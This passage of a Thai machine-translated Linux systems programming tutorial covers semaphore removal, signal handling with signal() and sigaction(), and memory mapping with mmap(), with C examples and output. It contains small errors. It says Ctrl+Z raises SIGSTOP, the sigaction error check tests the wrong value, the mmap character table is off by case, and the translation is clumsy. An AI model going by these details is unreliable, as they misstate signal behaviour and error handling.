void remove_semaphore() {
   int semid;
   int retval;
   semid = semget(SEM_KEY, 1, 0);
      if (semid < 0) {
         perror("Remove Semaphore: Semaphore GET: ");
         return;
      }
   retval = semctl(semid, 0, IPC_RMID);
   if (retval == -1) {
      perror("Remove Semaphore: Semaphore CTL: ");
      return;
   }
   return;
}

ขั้นตอนการรวบรวมและดำเนินการ

Total Count is 10000
First Process
SHM_WRITE: PARENT: Now writing
Second Process
SHM_WRITE: PARENT: Writing Done
SHM_WRITE: CHILD: Now writing
SHM_WRITE: CHILD: Writing Done
Writing Process: Complete

ตอนนี้เราจะตรวจสอบค่าตัวนับตามขั้นตอนการอ่าน

ขั้นตอนการดำเนินการ

Reading Process: Shared Memory: Counter is 20000
Reading Process: Reading Done, Detaching Shared Memory
Reading Process: Complete

signalเป็นการแจ้งเตือนถึงกระบวนการที่ระบุการเกิดขึ้นของเหตุการณ์ สัญญาณเรียกอีกอย่างว่าsoftware interrupt และไม่สามารถคาดเดาได้ว่าจะเกิดขึ้นดังนั้นจึงเรียกอีกอย่างว่า asynchronous event.

สัญญาณสามารถระบุได้ด้วยตัวเลขหรือชื่อโดยปกติชื่อสัญญาณจะขึ้นต้นด้วย SIG สัญญาณที่มีสามารถตรวจสอบได้ด้วยคำสั่ง kill –l (l สำหรับ Listing signal names) ซึ่งมีดังต่อไปนี้ -

เมื่อใดก็ตามที่สัญญาณเพิ่มขึ้น (สัญญาณที่สร้างโดยโปรแกรมหรือระบบ) การดำเนินการเริ่มต้นจะดำเนินการ จะเป็นอย่างไรหากคุณไม่ต้องการดำเนินการตามค่าเริ่มต้น แต่ต้องการดำเนินการของคุณเองในการรับสัญญาณ เป็นไปได้สำหรับสัญญาณทั้งหมดหรือไม่? ใช่มันเป็นไปได้ที่จะจัดการสัญญาณ แต่ไม่ใช่สำหรับสัญญาณทั้งหมด ถ้าคุณต้องการละเว้นสัญญาณเป็นไปได้หรือไม่? ใช่มันเป็นไปได้ที่จะเพิกเฉยต่อสัญญาณ การเพิกเฉยต่อสัญญาณหมายถึงการไม่ดำเนินการตามค่าเริ่มต้นหรือการจัดการสัญญาณ เป็นไปได้ที่จะเพิกเฉยหรือจัดการกับสัญญาณเกือบทั้งหมด สัญญาณที่ไม่สามารถเพิกเฉยหรือจัดการ / จับได้คือ SIGSTOP และ SIGKILL

โดยสรุปการดำเนินการสำหรับสัญญาณมีดังนี้ -

  • การดำเนินการเริ่มต้น
  • จัดการกับสัญญาณ
  • ไม่สนใจสัญญาณ

ตามที่กล่าวไว้สัญญาณสามารถจัดการได้โดยเปลี่ยนแปลงการดำเนินการตามค่าเริ่มต้น การจัดการสัญญาณสามารถทำได้สองวิธี ได้แก่ การเรียกระบบสัญญาณ () และซิกแอคชั่น ()

#include <signal.h>

typedef void (*sighandler_t) (int);
sighandler_t signal(int signum, sighandler_t handler);

สัญญาณเรียกระบบ () จะเรียกตัวจัดการที่ลงทะเบียนเมื่อสร้างสัญญาณตามที่ระบุไว้ในสัญญาณ ตัวจัดการสามารถเป็นหนึ่งใน SIG_IGN (ละเว้นสัญญาณ), SIG_DFL (การตั้งค่าสัญญาณกลับไปเป็นกลไกเริ่มต้น) หรือตัวจัดการสัญญาณที่ผู้ใช้กำหนดเองหรือที่อยู่ของฟังก์ชัน

การเรียกใช้ระบบนี้จะส่งคืนแอดเดรสของฟังก์ชันที่รับอาร์กิวเมนต์จำนวนเต็มและไม่มีค่าส่งคืน สายนี้ส่งคืน SIG_ERR ในกรณีที่เกิดข้อผิดพลาด

แม้ว่าจะมีสัญญาณ () ตัวจัดการสัญญาณที่เกี่ยวข้องตามที่ผู้ใช้ลงทะเบียนไว้ แต่สามารถเรียกใช้การปรับแต่งอย่างละเอียดเช่นการปิดบังสัญญาณที่ควรจะปิดกั้นการปรับเปลี่ยนลักษณะการทำงานของสัญญาณและฟังก์ชันอื่น ๆ จะไม่สามารถทำได้ สิ่งนี้เป็นไปได้โดยใช้การเรียกระบบ sigaction ()

#include <signal.h>

int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact)

การเรียกระบบนี้ใช้เพื่อตรวจสอบหรือเปลี่ยนแปลงการทำงานของสัญญาณ หากการกระทำไม่เป็นโมฆะการกระทำใหม่สำหรับสัญญาณสัญญาณจะถูกติดตั้งจากการกระทำ ถ้า oldact ไม่เป็นโมฆะการกระทำก่อนหน้านี้จะถูกบันทึกไว้ใน oldact

โครงสร้าง sigaction ประกอบด้วยฟิลด์ต่อไปนี้ -

Field 1 - Handler กล่าวถึงทั้งใน sa_handler หรือ sa_sigaction

void (*sa_handler)(int);
void (*sa_sigaction)(int, siginfo_t *, void *);

ตัวจัดการสำหรับ sa_handler ระบุการดำเนินการที่จะดำเนินการตามสัญญาณและด้วย SIG_DFL ที่ระบุการดำเนินการเริ่มต้นหรือ SIG_IGN เพื่อละเว้นสัญญาณหรือตัวชี้ไปยังฟังก์ชันการจัดการสัญญาณ

ตัวจัดการสำหรับ sa_sigaction ระบุหมายเลขสัญญาณเป็นอาร์กิวเมนต์แรกตัวชี้ไปยังโครงสร้าง siginfo_t เป็นอาร์กิวเมนต์ที่สองและตัวชี้ไปยังบริบทของผู้ใช้ (ตรวจสอบ getcontext () หรือ setcontext () สำหรับรายละเอียดเพิ่มเติม) เป็นอาร์กิวเมนต์ที่สาม

โครงสร้าง siginfo_t มีข้อมูลสัญญาณเช่นหมายเลขสัญญาณที่จะส่ง, ค่าสัญญาณ, รหัสกระบวนการ, รหัสผู้ใช้จริงของกระบวนการส่งเป็นต้น

Field 2 - ชุดสัญญาณที่จะปิดกั้น

int sa_mask;

ตัวแปรนี้ระบุหน้ากากของสัญญาณที่ควรถูกปิดกั้นระหว่างการทำงานของตัวจัดการสัญญาณ

Field 3 - ธงพิเศษ

int sa_flags;

ฟิลด์นี้ระบุชุดของแฟล็กที่ปรับเปลี่ยนพฤติกรรมของสัญญาณ

Field 4 - เรียกคืนตัวจัดการ

void (*sa_restorer) (void);

การเรียกระบบนี้คืนค่า 0 เมื่อสำเร็จและ -1 ในกรณีที่ล้มเหลว

ให้เราพิจารณาโปรแกรมตัวอย่างเล็กน้อย

ขั้นแรกให้เราเริ่มต้นด้วยโปรแกรมตัวอย่างซึ่งสร้างข้อยกเว้น ในโปรแกรมนี้เราพยายามดำเนินการหารด้วยศูนย์ซึ่งทำให้ระบบสร้างข้อยกเว้น

/* signal_fpe.c */
#include<stdio.h>

int main() {
   int result;
   int v1, v2;
   v1 = 121;
   v2 = 0;
   result = v1/v2;
   printf("Result of Divide by Zero is %d\n", result);
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

Floating point exception (core dumped)

ดังนั้นเมื่อเราพยายามดำเนินการทางคณิตศาสตร์ระบบได้สร้างข้อยกเว้นจุดลอยตัวพร้อมกับการถ่ายโอนข้อมูลหลักซึ่งเป็นการกระทำเริ่มต้นของสัญญาณ

ตอนนี้ให้เราแก้ไขรหัสเพื่อจัดการสัญญาณนี้โดยใช้การเรียกระบบสัญญาณ ()

/* signal_fpe_handler.c */
#include<stdio.h>
#include<signal.h>
#include<stdlib.h>

void handler_dividebyzero(int signum);

int main() {
   int result;
   int v1, v2;
   void (*sigHandlerReturn)(int);
   sigHandlerReturn = signal(SIGFPE, handler_dividebyzero);
   if (sigHandlerReturn == SIG_ERR) {
      perror("Signal Error: ");
      return 1;
   }
   v1 = 121;
   v2 = 0;
   result = v1/v2;
   printf("Result of Divide by Zero is %d\n", result);
   return 0;
}

void handler_dividebyzero(int signum) {
   if (signum == SIGFPE) {
      printf("Received SIGFPE, Divide by Zero Exception\n");
      exit (0);
   } 
   else
      printf("Received %d Signal\n", signum);
      return;
}

ขั้นตอนการรวบรวมและดำเนินการ

Received SIGFPE, Divide by Zero Exception

ตามที่กล่าวไว้สัญญาณถูกสร้างขึ้นโดยระบบ (เมื่อดำเนินการบางอย่างเช่นหารด้วยศูนย์เป็นต้น) หรือผู้ใช้ยังสามารถสร้างสัญญาณโดยใช้โปรแกรม หากคุณต้องการสร้างสัญญาณโดยใช้โปรแกรมให้ใช้ฟังก์ชันไลบรารี Raise ()

ตอนนี้ให้เราใช้โปรแกรมอื่นเพื่อสาธิตการจัดการและเพิกเฉยต่อสัญญาณ

สมมติว่าเราขึ้นสัญญาณโดยใช้ Raise () แล้วจะเกิดอะไรขึ้น? หลังจากเพิ่มสัญญาณการดำเนินการของกระบวนการปัจจุบันจะหยุดลง แล้วจะเกิดอะไรขึ้นกับกระบวนการหยุด? อาจมีสองสถานการณ์ - ขั้นแรกดำเนินการต่อเมื่อจำเป็น ประการที่สองยุติ (ด้วยคำสั่ง kill) กระบวนการ

หากต้องการดำเนินการต่อของกระบวนการที่หยุดทำงานให้ส่ง SIGCONT ไปยังกระบวนการนั้น ๆ คุณยังสามารถออกคำสั่ง fg (พื้นหน้า) หรือ bg (พื้นหลัง) เพื่อดำเนินการต่อได้ ที่นี่คำสั่งจะเริ่มต้นการดำเนินการของกระบวนการสุดท้ายอีกครั้งเท่านั้น หากมีการหยุดมากกว่าหนึ่งกระบวนการกระบวนการสุดท้ายเท่านั้นที่จะกลับมาทำงานต่อ หากคุณต้องการกลับสู่กระบวนการที่หยุดก่อนหน้านี้ให้กลับมาทำงานต่อ (โดยใช้ fg / bg) พร้อมกับหมายเลขงาน

โปรแกรมต่อไปนี้ใช้เพื่อเพิ่มสัญญาณ SIGSTOP โดยใช้ฟังก์ชัน Raise () Signal SIGSTOP สามารถสร้างได้โดยการกดปุ่ม CTRL + Z (Control + Z) หลังจากออกสัญญาณนี้โปรแกรมจะหยุดการทำงาน ส่งสัญญาณ (SIGCONT) เพื่อดำเนินการต่อ

ในตัวอย่างต่อไปนี้เรากำลังดำเนินการต่อกระบวนการหยุดด้วยคำสั่ง fg

/* signal_raising.c */
#include<stdio.h>
#include<signal.h>
#include<stdlib.h>

int main() {
   printf("Testing SIGSTOP\n");
   raise(SIGSTOP);
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

Testing SIGSTOP
[1]+ Stopped ./a.out
./a.out

ตอนนี้ปรับปรุงโปรแกรมก่อนหน้าเพื่อดำเนินการต่อของกระบวนการที่หยุดทำงานโดยการออก SIGCONT จากเทอร์มินัลอื่น

/* signal_stop_continue.c */
#include<stdio.h>
#include<signal.h>
#include <sys/types.h>
#include <unistd.h>

void handler_sigtstp(int signum);

int main() {
   pid_t pid;
   printf("Testing SIGSTOP\n");
   pid = getpid();
   printf("Open Another Terminal and issue following command\n");
   printf("kill -SIGCONT %d or kill -CONT %d or kill -18 %d\n", pid, pid, pid);
   raise(SIGSTOP);
   printf("Received signal SIGCONT\n");
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

Testing SIGSTOP
Open Another Terminal and issue following command
kill -SIGCONT 30379 or kill -CONT 30379 or kill -18 30379
[1]+ Stopped ./a.out

Received signal SIGCONT
[1]+ Done ./a.out

ในเทอร์มินัลอื่น

kill -SIGCONT 30379

จนถึงตอนนี้เราได้เห็นโปรแกรมที่จัดการสัญญาณที่สร้างโดยระบบ ตอนนี้ให้เราดูสัญญาณที่สร้างขึ้นผ่านโปรแกรม (โดยใช้ฟังก์ชัน Raise () หรือผ่านคำสั่ง kill) โปรแกรมนี้สร้างสัญญาณ SIGTSTP (เทอร์มินัลหยุด) ซึ่งการดำเนินการเริ่มต้นคือหยุดการดำเนินการ อย่างไรก็ตามเนื่องจากเรากำลังจัดการสัญญาณในขณะนี้แทนที่จะเป็นการดำเนินการเริ่มต้นสัญญาณจะมาถึงตัวจัดการที่กำหนดไว้ ในกรณีนี้เราแค่พิมพ์ข้อความและออก

/* signal_raising_handling.c */
#include<stdio.h>
#include<signal.h>
#include<stdlib.h>

void handler_sigtstp(int signum);

int main() {
   void (*sigHandlerReturn)(int);
   sigHandlerReturn = signal(SIGTSTP, handler_sigtstp);
   if (sigHandlerReturn == SIG_ERR) {
      perror("Signal Error: ");
      return 1;
   }
   printf("Testing SIGTSTP\n");
   raise(SIGTSTP);
   return 0;
}

void handler_sigtstp(int signum) {
   if (signum == SIGTSTP) {
      printf("Received SIGTSTP\n");
      exit(0);
   }
   else
      printf("Received %d Signal\n", signum);
      return;
}

ขั้นตอนการรวบรวมและดำเนินการ

Testing SIGTSTP
Received SIGTSTP

เราได้เห็นอินสแตนซ์ของการดำเนินการเริ่มต้นหรือการจัดการสัญญาณ ตอนนี้มันเป็นเวลาที่จะละเลยสัญญาณ ที่นี่ในโปรแกรมตัวอย่างนี้เรากำลังลงทะเบียนสัญญาณ SIGTSTP เพื่อละเว้นผ่าน SIG_IGN จากนั้นเราจะเพิ่มสัญญาณ SIGTSTP (เทอร์มินัลหยุด) เมื่อสัญญาณ SIGTSTP ถูกสร้างขึ้นซึ่งจะถูกละเว้น

/* signal_raising_ignoring.c */
#include<stdio.h>
#include<signal.h>
#include<stdlib.h>

void handler_sigtstp(int signum);

int main() {
   void (*sigHandlerReturn)(int);
   sigHandlerReturn = signal(SIGTSTP, SIG_IGN);
   if (sigHandlerReturn == SIG_ERR) {
      perror("Signal Error: ");
      return 1;
   }
   printf("Testing SIGTSTP\n");
   raise(SIGTSTP);
   printf("Signal SIGTSTP is ignored\n");
   return 0;
}

ขั้นตอนการรวบรวมและดำเนินการ

Testing SIGTSTP
Signal SIGTSTP is ignored

จนถึงขณะนี้เราสังเกตเห็นว่าเรามีตัวจัดการสัญญาณหนึ่งตัวเพื่อจัดการสัญญาณหนึ่งตัว เรามีตัวจัดการตัวเดียวเพื่อจัดการสัญญาณหลายตัวได้หรือไม่? คำตอบคือใช่ ให้เราพิจารณาสิ่งนี้ด้วยโปรแกรม

โปรแกรมต่อไปนี้ทำสิ่งต่อไปนี้ -

Step 1 - ลงทะเบียนตัวจัดการ (handleSignals) เพื่อจับหรือจัดการกับสัญญาณ SIGINT (CTRL + C) หรือ SIGQUIT (CTRL + \)

Step 2 - หากผู้ใช้สร้างสัญญาณ SIGQUIT (ไม่ว่าจะผ่านคำสั่ง kill หรือการควบคุมแป้นพิมพ์ด้วย CTRL + \) ตัวจัดการจะพิมพ์ข้อความเป็นส่งคืน

Step 3 - หากผู้ใช้สร้างสัญญาณ SIGINT (ผ่านคำสั่ง kill หรือการควบคุมแป้นพิมพ์ด้วย CTRL + C) ในครั้งแรกผู้ใช้จะแก้ไขสัญญาณเพื่อดำเนินการเริ่มต้น (ด้วย SIG_DFL) ในครั้งต่อไป

Step 4 - หากผู้ใช้สร้างสัญญาณ SIGINT ครั้งที่สองระบบจะดำเนินการตามค่าเริ่มต้นซึ่งเป็นการยุติโปรแกรม

/* Filename: sigHandler.c */
#include<stdio.h>
#include<unistd.h>
#include<signal.h>

void handleSignals(int signum);

int main(void) {
   void (*sigHandlerInterrupt)(int);
   void (*sigHandlerQuit)(int);
   void (*sigHandlerReturn)(int);
   sigHandlerInterrupt = sigHandlerQuit = handleSignals;
   sigHandlerReturn = signal(SIGINT, sigHandlerInterrupt);
   if (sigHandlerReturn == SIG_ERR) {
      perror("signal error: ");
      return 1;
   }
   sigHandlerReturn = signal(SIGQUIT, sigHandlerQuit);
   
   if (sigHandlerReturn == SIG_ERR) {
      perror("signal error: ");
      return 1;
   }
   while (1) {
      printf("\nTo terminate this program, perform the following: \n");
      printf("1. Open another terminal\n");
      printf("2. Issue command: kill %d or issue CTRL+C 2 times (second time it terminates)\n", getpid());
      sleep(10);
   }
   return 0;
}

void handleSignals(int signum) {
   switch(signum) {
      case SIGINT:
      printf("\nYou pressed CTRL+C \n");
      printf("Now reverting SIGINT signal to default action\n");
      signal(SIGINT, SIG_DFL);
      break;
      case SIGQUIT:
      printf("\nYou pressed CTRL+\\ \n");
      break;
      default:
      printf("\nReceived signal number %d\n", signum);
      break;
   }
   return;
}

ขั้นตอนการรวบรวมและดำเนินการ

To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 74 or issue CTRL+C 2 times (second time it terminates)
^C
You pressed CTRL+C
Now reverting SIGINT signal to default action
          
To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 74 or issue CTRL+C 2 times (second time it terminates)
^\You pressed CTRL+\
To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 120
Terminated

เทอร์มินัลอื่น

kill 71

วิธีที่สอง

To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 71 or issue CTRL+C 2 times (second time it terminates)
^C
You pressed CTRL+C
Now reverting SIGINT signal to default action

To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 71 or issue CTRL+C 2 times (second time it terminates)
^C

เรารู้ว่าในการจัดการสัญญาณเรามีการเรียกระบบสองสายคือสัญญาณ () หรือซิกแอคชั่น () จนถึงตอนนี้เราได้เห็นการเรียกระบบสัญญาณ () แล้วตอนนี้ถึงเวลาสำหรับการเรียกระบบ sigaction () ให้เราแก้ไขโปรแกรมด้านบนเพื่อดำเนินการโดยใช้ sigaction () ดังนี้ -

/* Filename: sigHandlerSigAction.c */
#include<stdio.h>
#include<unistd.h>
#include<signal.h>

void handleSignals(int signum);

int main(void) {
   void (*sigHandlerReturn)(int);
   struct sigaction mysigaction;
   mysigaction.sa_handler = handleSignals;
   sigemptyset(&mysigaction.sa_mask);
   mysigaction.sa_flags = 0;
   sigaction(SIGINT, &mysigaction, NULL);
   
   if (mysigaction.sa_handler == SIG_ERR) {
      perror("signal error: ");
      return 1;
   }
   mysigaction.sa_handler = handleSignals;
   sigemptyset(&mysigaction.sa_mask);
   mysigaction.sa_flags = 0;
   sigaction(SIGQUIT, &mysigaction, NULL);
   
   if (mysigaction.sa_handler == SIG_ERR) {
      perror("signal error: ");
      return 1;
   }
   while (-1) {
      printf("\nTo terminate this program, perform either of the following: \n");
      printf("1. Open another terminal and issue command: kill %d\n", getpid());
      printf("2. Issue CTRL+C 2 times (second time it terminates)\n");
      sleep(10);
   }
   return 0;
}

void handleSignals(int signum) {
   switch(signum) {
      case SIGINT:
      printf("\nYou have entered CTRL+C \n");
      printf("Now reverting SIGINT signal to perform default action\n");
      signal(SIGINT, SIG_DFL);
      break;
      case SIGQUIT:
      printf("\nYou have entered CTRL+\\ \n");
      break;
      default:
      printf("\nReceived signal number %d\n", signum);
      break;
   }
   return;
}

ให้เราดูขั้นตอนการรวบรวมและดำเนินการ ในขั้นตอนการดำเนินการให้เราดูปัญหา CTRL + C สองครั้งการตรวจสอบ / วิธีที่เหลือ (ตามด้านบน) คุณสามารถลองใช้โปรแกรมนี้ได้เช่นกัน

ขั้นตอนการรวบรวมและดำเนินการ

To terminate this program, perform either of the following:
1. Open another terminal and issue command: kill 3199
2. Issue CTRL+C 2 times (second time it terminates)
^C
You have entered CTRL+C
Now reverting SIGINT signal to perform default action
To terminate this program, perform either of the following:
1. Open another terminal and issue command: kill 3199
2. Issue CTRL+C 2 times (second time it terminates)
^C

การเรียกระบบ mmap () จัดเตรียมการแม็พในพื้นที่แอดเดรสเสมือนของกระบวนการเรียกที่แมปไฟล์หรืออุปกรณ์ลงในหน่วยความจำ นี่เป็นสองประเภท -

File mapping or File-backed mapping- การแมปนี้จะแมปพื้นที่ของหน่วยความจำเสมือนของกระบวนการกับไฟล์ ซึ่งหมายความว่าการอ่านหรือเขียนไปยังพื้นที่หน่วยความจำเหล่านั้นทำให้ไฟล์ถูกอ่านหรือเขียน นี่คือประเภทการแม็ปเริ่มต้น

Anonymous mapping- การทำแผนที่นี้จะแมปพื้นที่ของหน่วยความจำเสมือนของกระบวนการโดยไม่ได้รับการสนับสนุนจากไฟล์ใด ๆ เนื้อหาเริ่มต้นเป็นศูนย์ การแม็ปนี้คล้ายกับการจัดสรรหน่วยความจำแบบไดนามิก (malloc ()) และใช้ในการใช้งาน malloc () บางอย่างสำหรับการจัดสรรบางอย่าง

หน่วยความจำในการแม็ปกระบวนการหนึ่งอาจใช้ร่วมกันกับการแม็ปในกระบวนการอื่น สามารถทำได้สองวิธี -

  • เมื่อสองกระบวนการแมปพื้นที่เดียวกันของไฟล์พวกเขาจะใช้หน่วยความจำฟิสิคัลเพจเดียวกัน

  • หากมีการสร้างกระบวนการย่อยกระบวนการจะสืบทอดการแม็พของพาเรนต์และการแม็พเหล่านี้อ้างถึงเพจของหน่วยความจำฟิสิคัลเดียวกันกับของพาเรนต์ เมื่อมีการเปลี่ยนแปลงข้อมูลในกระบวนการย่อยหน้าต่างๆจะถูกสร้างขึ้นสำหรับกระบวนการย่อย

เมื่อกระบวนการสองกระบวนการขึ้นไปใช้เพจเดียวกันแต่ละกระบวนการสามารถเห็นการเปลี่ยนแปลงของเนื้อหาของเพจที่ทำโดยกระบวนการอื่นขึ้นอยู่กับประเภทการแม็ป ประเภทการแมปอาจเป็นแบบส่วนตัวหรือแบบแชร์ก็ได้ -

Private Mapping (MAP_PRIVATE) - การแก้ไขเนื้อหาของการแม็ปนี้ไม่สามารถมองเห็นได้ในกระบวนการอื่น ๆ และการทำแผนที่จะไม่ถูกนำไปใช้กับไฟล์ต้นแบบ

Shared Mapping (MAP_SHARED) - การแก้ไขเนื้อหาของการแม็ปนี้จะมองเห็นได้ในกระบวนการอื่น ๆ และการทำแผนที่จะดำเนินการไปยังไฟล์ต้นแบบ

#include <sys/mman.h>

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);

การเรียกระบบข้างต้นส่งคืนที่อยู่เริ่มต้นของการทำแผนที่เมื่อสำเร็จหรือ MAP_FAILED เมื่อเกิดข้อผิดพลาด

แอดเดรสแอดเดรสเสมือนสามารถเป็นได้ทั้งผู้ใช้ที่ระบุหรือสร้างโดยเคอร์เนล (เมื่อผ่าน addr เป็น NULL) ความยาวของฟิลด์ที่ระบุต้องการขนาดของการแมปเป็นไบต์ เขตข้อมูล prot ระบุค่าการป้องกันหน่วยความจำเช่น PROT_NONE, PROT_READ, PROT_WRITE, PROT_EXEC หมายถึงพื้นที่ที่ไม่สามารถเข้าถึงอ่านเขียนหรือดำเนินการได้ตามลำดับ ค่านี้สามารถเป็นค่าเดียว (PROT_NONE) หรือสามารถ ORd โดยใช้แฟล็กใดก็ได้จาก 3 แฟล็ก (3 สุดท้าย) แฟล็กฟิลด์ระบุประเภทการแม็ปหรือ MAP_PRIVATE หรือ MAP_SHARED ฟิลด์ 'fd' ระบุตัวบอกไฟล์ที่ระบุไฟล์ที่จะแมปและฟิลด์ 'ออฟเซ็ต' หมายถึงจุดเริ่มต้นของไฟล์หากจำเป็นต้องแม็พไฟล์ทั้งหมดออฟเซ็ตควรเป็นศูนย์

#include <sys/mman.h>

int munmap(void *addr, size_t length);

การเรียกระบบข้างต้นจะคืนค่า 0 เมื่อสำเร็จหรือ -1 เมื่อเกิดข้อผิดพลาด

munmap การเรียกระบบดำเนินการยกเลิกการแม็พของพื้นที่ที่แมปหน่วยความจำแล้ว addr ของฟิลด์ระบุแอดเดรสเริ่มต้นของการแม็พและความยาวระบุขนาดเป็นไบต์ของการแม็พที่จะไม่แมป โดยปกติแล้วการทำแผนที่และการยกเลิกการแมปจะเป็นของภูมิภาคที่แมปทั้งหมด หากต้องแตกต่างกันก็ควรหดหรือตัดเป็นสองส่วน หาก addr ไม่มีการแมปใด ๆ การเรียกนี้จะไม่มีผลและการโทรกลับเป็น 0 (สำเร็จ)

ให้เราพิจารณาตัวอย่าง -

Step 1 - เขียนลงในไฟล์ตัวอักษร Alpha Numeric ดังแสดงด้านล่าง -

0 1 2 25 26 27 28 29 30 31 32 33 34 35 36 37 38 59 60 61
A B C Z 0 1 2 3 4 5 6 7 8 9 A b c x y z

Step 2- แมปเนื้อหาไฟล์ลงในหน่วยความจำโดยใช้การเรียกระบบ mmap () สิ่งนี้จะส่งคืนที่อยู่เริ่มต้นหลังจากแมปลงในหน่วยความจำ

Step 3- เข้าถึงเนื้อหาไฟล์โดยใช้สัญกรณ์อาร์เรย์ (สามารถเข้าถึงด้วยสัญกรณ์ตัวชี้) เนื่องจากไม่อ่านการเรียกระบบ read () ที่มีราคาแพง ใช้การแมปหน่วยความจำหลีกเลี่ยงการคัดลอกหลาย ๆ ครั้งระหว่างพื้นที่ผู้ใช้บัฟเฟอร์พื้นที่เคอร์เนลและบัฟเฟอร์แคช

Step 4 - อ่านเนื้อหาไฟล์ซ้ำจนกว่าผู้ใช้จะเข้าสู่“ -1” (หมายถึงการสิ้นสุดการเข้าถึง)

Step 5 - ดำเนินกิจกรรมการล้างข้อมูลเช่นยกเลิกการแมปพื้นที่หน่วยความจำที่แมป (munmap ()) ปิดไฟล์และลบไฟล์

/* Filename: mmap_test.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
void write_mmap_sample_data();

int main() {
   struct stat mmapstat;
   char *data;
   int minbyteindex;
   int maxbyteindex;
   int offset;
   int fd;
   int unmapstatus;
   write_mmap_sample_data();
   if (stat("MMAP_DATA.txt", &mmapstat) == -1) {
      perror("stat failure");
      return 1;
   }
   
   if ((fd = open("MMAP_DATA.txt", O_RDONLY)) == -1) {
      perror("open failure");
      return 1;
   }
   data = mmap((caddr_t)0, mmapstat.st_size, PROT_READ, MAP_SHARED, fd, 0);
   
   if (data == (caddr_t)(-1)) {
      perror("mmap failure");
      return 1;
   }
   minbyteindex = 0;
   maxbyteindex = mmapstat.st_size - 1;
   
   do {
      printf("Enter -1 to quit or ");
      printf("enter a number between %d and %d: ", minbyteindex, maxbyteindex);
      scanf("%d",&offset);
      if ( (offset >= 0) && (offset <= maxbyteindex) )
      printf("Received char at %d is %c\n", offset, data[offset]);
      else if (offset != -1)
      printf("Received invalid index %d\n", offset);
   } while (offset != -1);
   unmapstatus = munmap(data, mmapstat.st_size);
   
   if (unmapstatus == -1) {
      perror("munmap failure");
      return 1;
   }
   close(fd);
   system("rm -f MMAP_DATA.txt");
   return 0;
}

void write_mmap_sample_data() {
   int fd;
   char ch;
   struct stat textfilestat;
   fd = open("MMAP_DATA.txt", O_CREAT|O_TRUNC|O_WRONLY, 0666);
   if (fd == -1) {
      perror("File open error ");
      return;
   }
   // Write A to Z
   ch = 'A';
   
   while (ch <= 'Z') {
      write(fd, &ch, sizeof(ch));
      ch++;
   }
   // Write 0 to 9
   ch = '0';
   
   while (ch <= '9') {
      write(fd, &ch, sizeof(ch));
      ch++;
   }
   // Write a to z
   ch = 'a';
   
   while (ch <= 'z') {
      write(fd, &ch, sizeof(ch));
      ch++;
   }
   close(fd);
   return;
}

เอาต์พุต

Enter -1 to quit or enter a number between 0 and 61: 3 
Received char at 3 is D 
Enter -1 to quit or enter a number between 0 and 61: 28
Received char at 28 is 2 
Enter -1 to quit or enter a number between 0 and 61: 38 
Received char at 38 is c 
Enter -1 to quit or enter a number between 0 and 61: 59 
Received char at 59 is x 
Enter -1 to quit or enter a number between 0 and 61: 65 
Received invalid index 65 
Enter -1 to quit or enter a number between 0 and 61: -99 
Received invalid index -99 
Enter -1 to quit or enter a number between 0 and 61: -1